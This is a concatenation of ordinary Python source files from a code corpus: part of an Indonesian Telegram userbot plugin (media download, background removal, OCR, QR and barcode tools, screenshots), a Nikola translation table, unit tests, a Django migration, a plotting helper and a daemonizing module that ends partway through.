return await v_url.edit(f"`{XAME.code}: {XAME.msg}\n{XAME.reason}`")
except ExtractorError:
return await v_url.edit("`There was an error during info extraction.`")
except Exception as e:
return await v_url.edit(f"{str(type(e)): {str(e)}}")
c_time = time.time()
if audio:
await v_url.edit(
f"**Sedang Mengupload Lagu:**\n`{rip_data.get('title')}`"
f"\nby **{rip_data.get('uploader')}**"
)
f_name = rip_data.get("id") + ".mp3"
with open(f_name, "rb") as f:
result = await upload_file(
client=v_url.client,
file=f,
name=f_name,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(
d, t, v_url, c_time, "Uploading..", f"{rip_data['title']}.mp3"
)
),
)
img_extensions = ["jpg", "jpeg", "webp"]
img_filenames = [
fn_img
for fn_img in os.listdir()
if any(fn_img.endswith(ext_img) for ext_img in img_extensions)
]
thumb_image = img_filenames[0]
metadata = extractMetadata(createParser(f_name))
duration = 0
if metadata.has("duration"):
duration = metadata.get("duration").seconds
await v_url.client.send_file(
v_url.chat_id,
result,
supports_streaming=True,
attributes=[
DocumentAttributeAudio(
duration=duration,
title=rip_data.get("title"),
performer=rip_data.get("uploader"),
)
],
thumb=thumb_image,
)
os.remove(thumb_image)
os.remove(f_name)
await v_url.delete()
elif video:
await v_url.edit(
f"**Sedang Mengupload Video:**\n`{rip_data.get('title')}`"
f"\nby **{rip_data.get('uploader')}**"
)
f_name = rip_data.get("id") + ".mp4"
with open(f_name, "rb") as f:
result = await upload_file(
client=v_url.client,
file=f,
name=f_name,
progress_callback=lambda d, t: asyncio.get_event_loop().create_task(
progress(
d, t, v_url, c_time, "Uploading..", f"{rip_data['title']}.mp4"
)
),
)
thumb_image = await get_video_thumb(f_name, "thumb.png")
metadata = extractMetadata(createParser(f_name))
duration = 0
width = 0
height = 0
if metadata.has("duration"):
duration = metadata.get("duration").seconds
if metadata.has("width"):
width = metadata.get("width")
if metadata.has("height"):
height = metadata.get("height")
await v_url.client.send_file(
v_url.chat_id,
result,
thumb=thumb_image,
attributes=[
DocumentAttributeVideo(
duration=duration,
w=width,
h=height,
supports_streaming=True,
)
],
caption=rip_data["title"],
)
os.remove(f_name)
os.remove(thumb_image)
await v_url.delete()
def deEmojify(inputString):
"""Remove emojis and other non-safe characters from string"""
return get_emoji_regexp().sub("", inputString)
@register(outgoing=True, pattern=r"^\.rbg(?: |$)(.*)")
async def kbg(remob):
"""For .rbg command, Remove Image Background."""
if REM_BG_API_KEY is None:
await remob.edit(
"`Error: Remove.BG API key missing! Add it to environment vars or config.env.`"
)
return
input_str = remob.pattern_match.group(1)
message_id = remob.message.id
if remob.reply_to_msg_id:
message_id = remob.reply_to_msg_id
reply_message = await remob.get_reply_message()
await remob.edit("`Processing..`")
try:
if isinstance(
reply_message.media, MessageMediaPhoto
) or "image" in reply_message.media.document.mime_type.split("/"):
downloaded_file_name = await remob.client.download_media(
reply_message, TEMP_DOWNLOAD_DIRECTORY
)
await remob.edit("`Removing background from this image..`")
output_file_name = await ReTrieveFile(downloaded_file_name)
os.remove(downloaded_file_name)
else:
await remob.edit("`Bagaimana cara menghapus latar belakang ini ?`")
except Exception as e:
await remob.edit(str(e))
return
elif input_str:
await remob.edit(
f"`Removing background from online image hosted at`\n{input_str}"
)
output_file_name = await ReTrieveURL(input_str)
else:
await remob.edit("`Saya butuh sesuatu untuk menghapus latar belakang.`")
return
contentType = output_file_name.headers.get("content-type")
if "image" in contentType:
with io.BytesIO(output_file_name.content) as remove_bg_image:
remove_bg_image.name = "removed_bg.png"
await remob.client.send_file(
remob.chat_id,
remove_bg_image,
caption="Support @SharingUserbot",
force_document=True,
reply_to=message_id,
)
await remob.delete()
else:
await remob.edit(
"**Error (Invalid API key, I guess ?)**\n`{}`".format(
output_file_name.content.decode("UTF-8")
)
)
# this method will call the API, and return in the appropriate format
# with the name provided.
async def ReTrieveFile(input_file_name):
headers = {
"X-API-Key": REM_BG_API_KEY,
}
files = {
"image_file": (input_file_name, open(input_file_name, "rb")),
}
return requests.post(
"https://api.remove.bg/v1.0/removebg",
headers=headers,
files=files,
allow_redirects=True,
stream=True,
)
async def ReTrieveURL(input_url):
headers = {
"X-API-Key": REM_BG_API_KEY,
}
data = {"image_url": input_url}
return requests.post(
"https://api.remove.bg/v1.0/removebg",
headers=headers,
data=data,
allow_redirects=True,
stream=True,
)
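# NOTE: on success remove.bg answers with the cut-out image bytes and an
# image/* content-type; on failure it returns a JSON error body instead, which
# is why kbg() inspects the "content-type" header before sending the file.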
@register(pattern=r"^\.ocr (.*)", outgoing=True)
async def ocr(event):
if not OCR_SPACE_API_KEY:
return await event.edit(
"`Error: OCR.Space API key is missing! Add it to environment variables or config.env.`"
)
await event.edit("`Sedang Membaca...`")
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
lang_code = event.pattern_match.group(1)
downloaded_file_name = await bot.download_media(
await event.get_reply_message(), TEMP_DOWNLOAD_DIRECTORY
)
test_file = await ocr_space_file(filename=downloaded_file_name, language=lang_code)
try:
ParsedText = test_file["ParsedResults"][0]["ParsedText"]
except BaseException:
await event.edit(
"`Tidak bisa membacanya.`\n`Saya rasa saya perlu kacamata baru.`"
)
else:
await event.edit(f"`Inilah yang bisa saya baca darinya:`\n\n{ParsedText}")
os.remove(downloaded_file_name)
@register(pattern=r"^\.decode$", outgoing=True)
async def parseqr(qr_e):
"""For .decode command, get QR Code/BarCode content from the replied photo."""
downloaded_file_name = await qr_e.client.download_media(
await qr_e.get_reply_message()
)
# parse the Official ZXing webpage to decode the QRCode
command_to_exec = [
"curl",
"-X",
"POST",
"-F",
"f=@" + downloaded_file_name + "",
"https://zxing.org/w/decode",
]
process = await asyncio.create_subprocess_exec(
*command_to_exec,
# stdout must a pipe to be accessible as process.stdout
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
# Wait for the subprocess to finish
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
os.remove(downloaded_file_name)
if not t_response:
LOGS.info(e_response)
LOGS.info(t_response)
return await qr_e.edit("Gagal untuk decode.")
soup = BeautifulSoup(t_response, "html.parser")
qr_contents = soup.find_all("pre")[0].text
await qr_e.edit(qr_contents)
@register(pattern=r"^\.barcode(?: |$)([\s\S]*)", outgoing=True)
async def bq(event):
"""For .barcode command, genrate a barcode containing the given content."""
await event.edit("`Processing..`")
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.barcode <long text to include>`"
reply_msg_id = event.message.id
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
reply_msg_id = previous_message.id
if previous_message.media:
downloaded_file_name = await event.client.download_media(previous_message)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = "".join(m.decode("UTF-8") + "\r\n" for m in m_list)
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
return event.edit("SYNTAX: `.barcode <long text to include>`")
bar_code_type = "code128"
try:
bar_code_mode_f = barcode.get(bar_code_type, message, writer=ImageWriter())
filename = bar_code_mode_f.save(bar_code_type)
await event.client.send_file(event.chat_id, filename, reply_to=reply_msg_id)
os.remove(filename)
except Exception as e:
return await event.edit(str(e))
await event.delete()
@register(pattern=r"^\.makeqr(?: |$)([\s\S]*)", outgoing=True)
async def make_qr(makeqr):
"""For .makeqr command, make a QR Code containing the given content."""
input_str = makeqr.pattern_match.group(1)
message = "SYNTAX: `.makeqr <long text to include>`"
reply_msg_id = None
if input_str:
message = input_str
elif makeqr.reply_to_msg_id:
previous_message = await makeqr.get_reply_message()
reply_msg_id = previous_message.id
if previous_message.media:
downloaded_file_name = await makeqr.client.download_media(previous_message)
m_list = None
with open(downloaded_file_name, "rb") as file:
m_list = file.readlines()
message = "".join(media.decode("UTF-8") + "\r\n" for media in m_list)
os.remove(downloaded_file_name)
else:
message = previous_message.message
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=10,
border=4,
)
qr.add_data(message)
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white")
img.save("img_file.webp", "PNG")
await makeqr.client.send_file(
makeqr.chat_id, "img_file.webp", reply_to=reply_msg_id
)
os.remove("img_file.webp")
await makeqr.delete()
@register(pattern=r"^\.ss (.*)", outgoing=True)
async def capture(url):
"""For .ss command, capture a website's screenshot and send the photo."""
await url.edit("`Processing...`")
chrome_options = await options()
chrome_options.add_argument("--test-type")
chrome_options.add_argument("--ignore-certificate-errors")
chrome_options.arguments.remove("--window-size=1920x1080")
driver = await chrome(chrome_options=chrome_options)
input_str = url.pattern_match.group(1)
link_match = match(r"\bhttps?://.*\.\S+", input_str)
if link_match:
link = link_match.group()
else:
return await url.edit("`I need a valid link to take screenshots from.`")
driver.get(link)
height = driver.execute_script(
"return Math.max(document.body.scrollHeight, document.body.offsetHeight, "
"document.documentElement.clientHeight, document.documentElement.scrollHeight, "
"document.documentElement.offsetHeight);"
)
width = driver.execute_script(
"return Math.max(document.body.scrollWidth, document.body.offsetWidth, "
"document.documentElement.clientWidth, document.documentElement.scrollWidth, "
"document.documentElement.offsetWidth);"
)
driver.set_window_size(width + 125, height + 125)
wait_for = height / 1000
await url.edit(
"`Generating screenshot of the page...`"
f"\n`Height of page = {height}px`"
f"\n`Width of page = {width}px`"
f"\n`Waiting ({int(wait_for)}s) for the page to load.`"
)
await sleep(int(wait_for))
im_png = driver.get_screenshot_as_png()
# saves screenshot of entire page
driver.quit()
message_id = url.message.id
if url.reply_to_msg_id:
message_id = url.reply_to_msg_id
with io.BytesIO(im_png) as out_file:
out_file.name = "screencapture.png"
await url.edit("`Uploading screenshot as file..`")
await url.client.send_file(
url.chat_id,
out_file,
caption=input_str,
force_document=True,
reply_to=message_id,
)
await url.delete()
CMD_HELP.update(
{
"tts": "**Plugin : **`tts`\
\n\n • **Syntax :** `.tts` <text/reply>\
\n • **Function : **Menerjemahkan teks ke ucapan untuk bahasa yang disetel. \
\n\n • **NOTE :** Gunakan .lang tts <kode bahasa> untuk menyetel bahasa untuk tr **(Bahasa Default adalah bahasa Indonesia)**\
"
}
)
CMD_HELP.update(
{
"translate": "**Plugin : **`Terjemahan`\
\n\n • **Syntax :** `.tr` <text/reply>\
\n • **Function : **Menerjemahkan teks ke bahasa yang disetel.\
\n\n • **NOTE :** Gunakan .lang tr <kode bahasa> untuk menyetel bahasa untuk tr **(Bahasa Default adalah bahasa Indonesia)**\
"
}
)
CMD_HELP.update(
{
"carbon": "**Plugin : **`carbon`\
\n\n • **Syntax :** `.carbon` <text/reply>\
\n • **Function : **Percantik kode Anda menggunakan carbon.now.sh\
\n\n • **NOTE :** Gunakan .crblang <text> untuk menyetel bahasa kode Anda.\
"
}
)
CMD_HELP.update(
{
"removebg": "**Plugin : **`removebg`\
\n\n • **Syntax :** `.rbg` <Tautan ke Gambar> atau balas gambar apa pun (Peringatan: tidak berfungsi pada stiker.)\
\n • **Function : **Menghapus latar belakang gambar, menggunakan API remove.bg\
"
}
)
CMD_HELP.update(
{
"ocr": "**Plugin : **`ocr`\
\n\n • **Syntax :** `.ocr` <kode bahasa>\
\n • **Function : **Balas gambar atau stiker untuk mengekstrak teks media tersebut.\
"
}
)
CMD_HELP.update(
{
"youtube": "**Plugin : **`youtube`\
\n\n • **Syntax :** `.yt` <jumlah> <query>\
\n • **Function : **Melakukan Pencarian YouTube. Dapat menentukan jumlah hasil yang dibutuhkan (default adalah 5)\
"
}
)
CMD_HELP.update(
{
"google": "**Plugin : **`google`\
\n\n • **Syntax :** `.google` <flags> <query>\
\n • **Function : **Untuk Melakukan pencarian di google (default 5 hasil pencarian)\
\n • **Flags :** `-l` **= Untuk jumlah hasil pencarian.**\
\n • **Example :** `.google -l4 mrismanaziz` atau `.google mrismanaziz`\
"
}
)
CMD_HELP.update(
{
"wiki": "**Plugin : **`wiki`\
\n\n • **Syntax :** `.wiki` <query>\
\n • **Function : **Melakukan pencarian di Wikipedia.\
"
}
)
CMD_HELP.update(
{
"barcode": "**Plugin : **`barcode`\
\n\n • **Syntax :** `.barcode` <content>\
\n • **Function :** Buat Kode Batang dari konten yang diberikan.\
\n\n • **Example :** `.barcode www.google.com`\
\n\n • **Syntax :** `.makeqr` <content>\
\n • **Function :** Buat Kode QR dari konten yang diberikan.\
\n\n • **Example :** `.makeqr www.google.com`\
\n\n • **NOTE :** Gunakan .decode <reply to barcode / qrcode> untuk mendapatkan konten yang didekodekan.\
"
}
)
CMD_HELP.update(
{
"image_search": "**Plugin : **`image_search`\
\n\n • **Syntax :** `.img` <search_query>\
\n • **Function : **Melakukan pencarian gambar di Google dan menampilkan 15 gambar.\
"
}
)
CMD_HELP.update(
{
"ytdl": "**Plugin : **`ytdl`\
\n\n • **Syntax :** `.ytaudio` <url>\
\n • **Function : **Untuk Mendownload lagu dari YouTube.\
\n\n • **Syntax :** `.ytvideo` <url>\
\n • **Function : **Untuk Mendownload video dari YouTube.\
"
}
)
CMD_HELP.update(
{
"screenshot": "**Plugin : **`screenshot`\
\n\n • **Syntax :** `.ss` <url>\
\n • **Function : **Mengambil tangkapan layar dari situs web dan mengirimkan tangkapan layar.\
\n • **Example :** `.ss http://www.google.com`\
"
}
)
CMD_HELP.update(
{
"currency": "**Plugin : **`currency`\
\n\n • **Syntax :** `.currency` <amount> <from> <to>\
\n • **Function : **Mengonversi berbagai mata uang untuk Anda.\
"
}
)
CMD_HELP.update(
{
"ud": "**Plugin : **`Urban Dictionary`\
\n\n • **Syntax :** `.ud` <query>\
\n • **Function : **Melakukan pencarian di Urban Dictionary.\
"
}
)
| avg_line_length 32.989758 | max_line_length 136 | alphanum_fraction 0.592109 |
| 2d537e68c0c2ae9afa9e1a562323f66969b4a194 | 1,757 | py | Python | nikola/data/themes/base/messages/messages_bs.py | asmeurer/nikola | ea1c651bfed0fd6337f1d22cf8dd99899722912c | ["MIT"] | 1,901 | 2015-01-02T02:49:51.000Z | 2022-03-30T23:31:35.000Z | nikola/data/themes/base/messages/messages_bs.py | asmeurer/nikola | ea1c651bfed0fd6337f1d22cf8dd99899722912c | ["MIT"] | 1,755 | 2015-01-01T08:17:16.000Z | 2022-03-24T18:02:22.000Z | nikola/data/themes/base/messages/messages_bs.py | asmeurer/nikola | ea1c651bfed0fd6337f1d22cf8dd99899722912c | ["MIT"] | 421 | 2015-01-02T18:06:37.000Z | 2022-03-28T23:18:54.000Z |
# -*- encoding:utf-8 -*-
"""Autogenerated file, do not edit. Submit translations on Transifex."""
MESSAGES = {
"%d min remaining to read": "%d minuta preostalo za čitanje",
"(active)": "(aktivno)",
"Also available in:": "Takođe dostupan u:",
"Archive": "Arhiva",
"Atom feed": "",
"Authors": "Autori",
"Categories": "Kategorije",
"Comments": "Komentari",
"LANGUAGE": "Bosanski",
"Languages:": "Jezici:",
"More posts about %s": "Više članaka o %s",
"Newer posts": "Novije objave",
"Next post": "Naredni članak",
"Next": "",
"No posts found.": "Nema članaka.",
"Nothing found.": "Ništa nije pronađeno.",
"Older posts": "Starije objave",
"Original site": "Izvorni sajt",
"Posted:": "Objavljeno:",
"Posts about %s": "Objave o %s",
"Posts by %s": "Objave prema %s",
"Posts for year %s": "Objave u godini %s",
"Posts for {month_day_year}": "Objave za {month_day_year}",
"Posts for {month_year}": "Objave za {month_year}",
"Previous post": "Prethodni članak",
"Previous": "",
"Publication date": "Datum objavljivanja",
"RSS feed": "RSS feed",
"Read in English": "Pročitaj na bosanskom",
"Read more": "Pročitaj više",
"Skip to main content": "Preskoči na glavni sadržaj",
"Source": "Izvor",
"Subcategories:": "Podkategorije:",
"Tags and Categories": "Oznake i kategorije",
"Tags": "Oznake",
"Toggle navigation": "",
"Uncategorized": "Bez kategorije",
"Up": "",
"Updates": "Ažuriranja",
"Write your page here.": "Vašu stranicu napišite ovdje.",
"Write your post here.": "Vaš članak napišite ovdje.",
"old posts, page %d": "stare objave, strana %d",
"page %d": "strana %d",
"updated": "",
}
| avg_line_length 35.14 | max_line_length 72 | alphanum_fraction 0.595902 |
| 05ccd24debd44e59c4bef8d60f2fb3275a2e50ba | 2,909 | py | Python | src/config/common/tests/test_analytics_client.py | biswajit-mandal/contrail-controller | 80c4a7e8515f7296b18ba4c21a439bd3daefcc4a | ["Apache-2.0"] | 5 | 2015-01-08T17:34:41.000Z | 2017-09-28T16:00:25.000Z | src/config/common/tests/test_analytics_client.py | biswajit-mandal/contrail-controller | 80c4a7e8515f7296b18ba4c21a439bd3daefcc4a | ["Apache-2.0"] | 2 | 2018-12-04T02:20:52.000Z | 2018-12-22T06:16:30.000Z | src/config/common/tests/test_analytics_client.py | biswajit-mandal/contrail-controller | 80c4a7e8515f7296b18ba4c21a439bd3daefcc4a | ["Apache-2.0"] | 18 | 2017-01-12T09:28:44.000Z | 2019-04-18T20:47:42.000Z |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2014 Cloudwatt
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sylvain Afchain, eNovance.
import mock
import unittest
from cfgm_common.analytics_client import Client
class TestOpenContrailClient(unittest.TestCase):
def setUp(self):
super(TestOpenContrailClient, self).setUp()
self.client = Client('http://127.0.0.1:8081', {'arg1': 'aaa'})
self.get_resp = mock.MagicMock()
self.get = mock.patch('requests.get',
return_value=self.get_resp).start()
self.get_resp.raw_version = 1.1
self.get_resp.status_code = 200
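    # NOTE: self.get.call_args_list[i] is the (args, kwargs) pair recorded by
    # mock for the i-th requests.get call, so call_args_list[i][0][0] in the
    # tests below is the positional URL argument of call i.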
def test_analytics_request_without_data(self):
self.client.request('/fake/path/', 'fake_uuid')
call_args = self.get.call_args_list[0][0]
call_kwargs = self.get.call_args_list[0][1]
expected_url = ('http://127.0.0.1:8081/fake/path/fake_uuid')
self.assertEqual(expected_url, call_args[0])
data = call_kwargs.get('data')
expected_data = {'arg1': 'aaa'}
self.assertEqual(expected_data, data)
def test_analytics_request_with_data(self):
self.client.request('fake/path/', 'fake_uuid',
{'key1': 'value1',
'key2': 'value2'})
call_args = self.get.call_args_list[0][0]
call_kwargs = self.get.call_args_list[0][1]
expected_url = ('http://127.0.0.1:8081/fake/path/fake_uuid')
self.assertEqual(expected_url, call_args[0])
data = call_kwargs.get('data')
expected_data = {'arg1': 'aaa',
'key1': 'value1',
'key2': 'value2'}
self.assertEqual(expected_data, data)
self.client.request('fake/path/', 'fake_uuid',
{'key3': 'value3',
'key4': 'value4'})
call_args = self.get.call_args_list[1][0]
call_kwargs = self.get.call_args_list[1][1]
expected_url = ('http://127.0.0.1:8081/fake/path/fake_uuid')
self.assertEqual(expected_url, call_args[0])
data = call_kwargs.get('data')
expected_data = {'arg1': 'aaa',
'key3': 'value3',
'key4': 'value4'}
self.assertEqual(expected_data, data)
| avg_line_length 34.223529 | max_line_length 78 | alphanum_fraction 0.607769 |
| 4cbf23f7bf1029ef8a3da82520f908398ffbff3e | 346 | py | Python | Olympiad Solutions/URI/1467.py | Ashwanigupta9125/code-DS-ALGO | 49f6cf7d0c682da669db23619aef3f80697b352b | ["MIT"] | 36 | 2019-12-27T08:23:08.000Z | 2022-01-24T20:35:47.000Z | Olympiad Solutions/URI/1467.py | Ashwanigupta9125/code-DS-ALGO | 49f6cf7d0c682da669db23619aef3f80697b352b | ["MIT"] | 10 | 2019-11-13T02:55:18.000Z | 2021-10-13T23:28:09.000Z | Olympiad Solutions/URI/1467.py | Ashwanigupta9125/code-DS-ALGO | 49f6cf7d0c682da669db23619aef3f80697b352b | ["MIT"] | 53 | 2020-08-15T11:08:40.000Z | 2021-10-09T15:51:38.000Z |
#!/usr/bin/env python2.7
# encoding : utf-8
# Ivan Carvalho
# Solution to https://www.urionlinejudge.com.br/judge/problems/view/1467
while True:
try:
e = raw_input()
if e in ["0 0 0","1 1 1"]:
print "*"
elif e in ["1 0 0","0 1 1"]:
print "A"
elif e in ["1 0 1","0 1 0"]:
print "B"
else:
print "C"
except EOFError:
break
| avg_line_length 19.222222 | max_line_length 72 | alphanum_fraction 0.589595 |
| cb02e21abd5dd43d214f96868619ec3b23eb9101 | 492 | py | Python | product/migrations/0013_product_code_product.py | SergueiNK/oc_projet_p8 | a2a3e3df7ecd048207f342343163a3aecf246423 | ["Unlicense"] | null | null | null | product/migrations/0013_product_code_product.py | SergueiNK/oc_projet_p8 | a2a3e3df7ecd048207f342343163a3aecf246423 | ["Unlicense"] | 3 | 2021-12-04T16:47:44.000Z | 2021-12-04T19:25:31.000Z | product/migrations/0013_product_code_product.py | SergueiNK/oc_projet_p8 | a2a3e3df7ecd048207f342343163a3aecf246423 | ["Unlicense"] | null | null | null |
# Generated by Django 3.2.6 on 2021-10-26 22:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0012_alter_product_product_name'),
]
operations = [
migrations.AddField(
model_name='product',
name='code_product',
field=models.CharField(default=0, max_length=100, unique=True, verbose_name='code of product'),
preserve_default=False,
),
]
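# NOTE: preserve_default=False means default=0 is applied only once, to
# backfill existing rows while this migration runs; it is not kept as the
# field's default afterwards (standard behavior of this generated pattern).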
| avg_line_length 24.6 | max_line_length 107 | alphanum_fraction 0.628049 |
| a8e0e237ae94ac73d8abde7ca53318639b99b61c | 1,474 | py | Python | OnlySemWork/plot.py | rohun-tripati/UGP-Robotics | 46517c6393724937cc2625252fd88036a1a3fef7 | ["Unlicense"] | null | null | null | OnlySemWork/plot.py | rohun-tripati/UGP-Robotics | 46517c6393724937cc2625252fd88036a1a3fef7 | ["Unlicense"] | null | null | null | OnlySemWork/plot.py | rohun-tripati/UGP-Robotics | 46517c6393724937cc2625252fd88036a1a3fef7 | ["Unlicense"] | null | null | null |
import numpy as np
import sys
import numpy.linalg as linalg
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
import math
def plotthis(num, ellips, ellarr, tree, adjval):  # module from the net
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for k in range(0,num):#fornow
center = ellips[k] #print "center = ", center
A = ellarr[k] #print "a = ", A
U, s, rotation = linalg.svd(A)
radii = 1.0/np.sqrt(s)
u = np.linspace(0.0, 2* np.pi, 100)
v = np.linspace(0.0, 2*np.pi, 100)
x = radii[0] * np.outer(np.cos(u), np.sin(v))
y = radii[1] * np.outer(np.sin(u), np.sin(v))
z = radii[2] * np.outer(np.ones_like(u), np.cos(v))
for i in range(len(x)):
for j in range(len(x)):
[x[i,j],y[i,j],z[i,j]] = np.dot([x[i,j],y[i,j],z[i,j]], rotation) + center
if k==0: #Different colors
ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='b', alpha=0.2)
else:
ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='r', alpha=0.2)
# print "x = ", x, len(x[0]) # print "y = ", y, len(y) # print "Z = ", z, len(z)
    for lin in tree:
        n, m, p = [], [], []
        for i in range(0, 2):
            n.append(adjval[lin[i]][0])
            m.append(adjval[lin[i]][1])
            p.append(adjval[lin[i]][2])
ax.plot_wireframe(n,m,p, color="green", linewidth=2.0, linestyle="-")
plt.show()
plt.close(fig) #print "finished plotthis"
del fig
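# Illustrative call (a sketch, not from the original file; argument shapes are
# inferred from the code above and the values are hypothetical):
#
# plotthis(num=2,
#          ellips=[np.zeros(3), np.ones(3)],    # ellipsoid centers
#          ellarr=[np.eye(3), 2 * np.eye(3)],   # 3x3 SPD shape matrices
#          tree=[(0, 1)],                       # edges between nodes
#          adjval=[[0, 0, 0], [1, 1, 1]])       # node coordinates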
| avg_line_length 29.48 | max_line_length 86 | alphanum_fraction 0.601085 |
| 6daa873cddfa2502c6d8e41ffaba39095657e070 | 1,020 | py | Python | kubernetes/test/test_v1_resource_field_selector.py | jashandeep-sohi/kubernetes-python | e057f273069de445a2d5a250ac5fe37d79671f3b | ["Apache-2.0"] | 1 | 2020-05-08T12:41:04.000Z | 2020-05-08T12:41:04.000Z | kubernetes/test/test_v1_resource_field_selector.py | jashandeep-sohi/kubernetes-python | e057f273069de445a2d5a250ac5fe37d79671f3b | ["Apache-2.0"] | null | null | null | kubernetes/test/test_v1_resource_field_selector.py | jashandeep-sohi/kubernetes-python | e057f273069de445a2d5a250ac5fe37d79671f3b | ["Apache-2.0"] | 2 | 2021-07-09T08:49:05.000Z | 2021-08-03T18:08:36.000Z |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_resource_field_selector import V1ResourceFieldSelector
class TestV1ResourceFieldSelector(unittest.TestCase):
""" V1ResourceFieldSelector unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ResourceFieldSelector(self):
"""
Test V1ResourceFieldSelector
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_resource_field_selector.V1ResourceFieldSelector()
pass
if __name__ == '__main__':
unittest.main()
| avg_line_length 22.666667 | max_line_length 105 | alphanum_fraction 0.72549 |
| 07395514772774691ef0ff993042d9bbd8e7dc0b | 7,196 | py | Python | daemonize.py | IloveKanade/k3daemonize | ac615704a34c358c7a8490013e8bc083e547e014 | ["MIT"] | null | null | null | daemonize.py | IloveKanade/k3daemonize | ac615704a34c358c7a8490013e8bc083e547e014 | ["MIT"] | 2 | 2021-10-16T11:40:07.000Z | 2022-03-23T06:57:44.000Z | daemonize.py | IloveKanade/k3daemonize | ac615704a34c358c7a8490013e8bc083e547e014 | ["MIT"] | 1 | 2021-08-18T07:48:38.000Z | 2021-08-18T07:48:38.000Z |
import errno
import fcntl
import logging
import os
import signal
import sys
import time
import __main__
logger = logging.getLogger(__name__)
class Daemon(object):
def __init__(self,
pidfile=None,
stdin='/dev/null',
stdout='/dev/null',
stderr='/dev/null',
close_fds=False):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile or _default_pid_file()
# NOTE: We need to open another separate file to avoid the file
# being reopened again.
# In which case, process loses file lock.
#
# From "man fcntl":
# As well as being removed by an explicit F_UNLCK, record locks are
# automatically released when the process terminates or if it
# closes any file descriptor referring to a file on which locks
# are held. This is bad: it means that a process can lose the locks
# on a file like /etc/passwd or /etc/mtab when for some reason a
# library function decides to open, read and close it.
self.lockfile = self.pidfile + ".lock"
self.lockfp = None
self.close_fds = close_fds
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
_close_std_io()
sys.exit(0)
except OSError as e:
logger.error("fork #1 failed: " + repr(e))
sys.exit(1)
# decouple from parent environment
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
_close_std_io()
sys.exit(0)
except OSError as e:
logger.error("fork #2 failed: " + repr(e))
sys.exit(1)
if self.close_fds:
_close_fds()
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(self.stdin, 'r')
so = open(self.stdout, 'a+')
se = open(self.stderr, 'a+')
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
logger.info("OK daemonized")
def trylock_or_exit(self, timeout=10):
interval = 0.1
n = int(timeout / interval) + 1
flag = fcntl.LOCK_EX | fcntl.LOCK_NB
for ii in range(n):
fd = os.open(self.lockfile, os.O_RDWR | os.O_CREAT)
fcntl.fcntl(fd, fcntl.F_SETFD,
fcntl.fcntl(fd, fcntl.F_GETFD, 0)
| fcntl.FD_CLOEXEC)
try:
fcntl.lockf(fd, flag)
self.lockfp = os.fdopen(fd, 'w+')
break
except IOError as e:
os.close(fd)
                if e.errno == errno.EAGAIN:
time.sleep(interval)
else:
raise
else:
logger.info("Failure acquiring lock %s" % (self.lockfile, ))
sys.exit(1)
logger.info("OK acquired lock %s" % (self.lockfile))
def unlock(self):
if self.lockfp is None:
return
fd = self.lockfp.fileno()
fcntl.lockf(fd, fcntl.LOCK_UN)
self.lockfp.close()
self.lockfp = None
def start(self):
self.daemonize()
self.init_proc()
def init_proc(self):
self.trylock_or_exit()
self.write_pid_or_exit()
def write_pid_or_exit(self):
self.pf = open(self.pidfile, 'w+')
pf = self.pf
fd = pf.fileno()
fcntl.fcntl(fd, fcntl.F_SETFD,
fcntl.fcntl(fd, fcntl.F_GETFD, 0)
| fcntl.FD_CLOEXEC)
try:
pid = os.getpid()
logger.debug('write pid:' + str(pid))
pf.truncate(0)
pf.write(str(pid))
pf.flush()
except Exception as e:
logger.exception('write pid failed.' + repr(e))
sys.exit(0)
def stop(self):
pid = None
if not os.path.exists(self.pidfile):
logger.debug('pidfile not exist:' + self.pidfile)
return
try:
pid = _read_file(self.pidfile)
pid = int(pid)
os.kill(pid, signal.SIGTERM)
return
except Exception as e:
            logger.warning('{e} while getting and killing pid={pid}'.format(
                e=repr(e), pid=pid))
def _read_file(fn):
with open(fn, 'r') as f:
return f.read()
def _close_std_io():
os.close(0)
os.close(1)
os.close(2)
def _close_fds():
try:
max_fd = os.sysconf("SC_OPEN_MAX")
except ValueError as e:
logger.warning(repr(e) + ' while get max fds of a process')
max_fd = 65536
